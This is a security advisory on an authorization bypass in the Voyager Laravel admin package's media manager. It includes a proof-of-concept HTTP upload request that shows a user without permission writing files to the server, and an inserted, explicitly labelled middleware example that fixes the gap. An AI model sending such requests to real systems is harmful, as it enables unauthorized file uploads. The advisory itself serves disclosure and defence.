#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Voyager
# Vendor:   The Control Group (Open Source)
# CSNC ID:  CSNC-2018-38
# Subject:  Authorization Bypass
# Risk:     High (CVSS 3.0 Base Score: 7.1)
# CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N/E:P/RL:O/RC:C
# Effect:   Remotely exploitable
# Author:   Fabio Poloni
# Date:     07.11.2018
#
#############################################################

Introduction
------------

Voyager [1] is a Laravel admin package that includes BREAD (CRUD) operations, a media manager, a menu builder, and much more.

For file uploads it ships a media manager, which can upload, rename and delete files on the filesystem. The media manager API is reachable by any logged-in user.

Affected
--------

Vulnerable:

* Version 1.1.10

Other versions were not tested.

Technical Description
---------------------

The media manager API can be used even if the user does not hold the "Browse Media" permission. Only the UI page is gated; the endpoints behind it are not, so a logged-in user without the permission can call them directly:

````
POST /admin/media/upload HTTP/1.1
Host: localhost:8000
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------178790972713939268652054415808
Content-Length: 510
Cookie: XSRF-TOKEN=[...]; laravel_session=[...]
Connection: close

-----------------------------178790972713939268652054415808
Content-Disposition: form-data; name="_token"

[...]
-----------------------------178790972713939268652054415808
Content-Disposition: form-data; name="upload_path"


-----------------------------178790972713939268652054415808
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

This should not be uploaded!
-----------------------------178790972713939268652054415808--
````

The uploaded file can then be accessed as expected at "http://example.com/storage/test.txt".
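The defensive pattern behind this finding is that authorization must be enforced on the API endpoints themselves, not only on the page that renders the media manager. The following Laravel middleware and route excerpt is an added illustration, not Voyager's code and not its fix; it assumes a Gate ability named `browse_media` mirroring the "Browse Media" permission, an `App\Http\Controllers\MediaController`, and that the media endpoints live under `/admin/media`.

```php
<?php
// app/Http/Middleware/RequireMediaPermission.php
// Added illustration, not Voyager's own code. The ability name "browse_media"
// and the controller class are assumptions for this example.
namespace App\Http\Middleware;

use Closure;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Gate;
use Symfony\Component\HttpFoundation\Response;

class RequireMediaPermission
{
    public function handle(Request $request, Closure $next): Response
    {
        $user = $request->user();

        // Being logged in is not sufficient: every media-manager call (upload,
        // rename, delete, ...) must also pass the permission check.
        if ($user === null || Gate::forUser($user)->denies('browse_media')) {
            // Uniform 403 for browser and XHR callers; nothing about storage
            // paths or existing files is disclosed to an unauthorized user.
            abort(403, 'Browse Media permission required.');
        }

        return $next($request);
    }
}

// routes/web.php (excerpt): attach the middleware to the whole media route
// group so the API cannot be called directly by a user who merely lacks the
// link to the UI. The upload route matches the request shown in the advisory.
use App\Http\Controllers\MediaController;
use App\Http\Middleware\RequireMediaPermission;
use Illuminate\Support\Facades\Route;

Route::middleware(['web', 'auth', RequireMediaPermission::class])
    ->prefix('admin/media')
    ->group(function () {
        Route::post('upload', [MediaController::class, 'upload']);
        // rename, delete and any other media endpoints belong in this same
        // group; a route registered outside it would reintroduce the bypass.
    });
```

A feature test that logs in a user without the permission and asserts a 403 on POST /admin/media/upload turns this into a regression check for the bypass described above.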
Vulnerability Classification
----------------------------

* CVSS v3.0 Base Score: 7.1
* CVSS v3.0 Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N/E:P/RL:O/RC:C

Remediation
-----------

Update to the latest release (1.2.0). Please see the Voyager releases page [2] for release notes and download links.

Timeline
--------

2019-03-05: According to the vendor, the vulnerability has been addressed (https://github.com/the-control-group/voyager/pull/3821)
2018-12-20: Vulnerabilities confirmed
2018-12-18: Fifth contact attempt via email to a former and a current maintainer, response received
2018-11-23: Fourth contact attempt via email (hello@thecontrolgroup.com) and direct contact to an employee on LinkedIn
2018-11-16: Third contact attempt via email (hello@thecontrolgroup.com)
2018-11-14: Second contact attempt via Twitter (@ControlGroup_SD)
2018-11-07: Initial vendor notification via contact form (https://thecontrolgroup.com/contact)
2018-11-05: Discovery by Fabio Poloni

References
----------

[1] https://github.com/the-control-group/voyager
[2] https://github.com/the-control-group/voyager/releases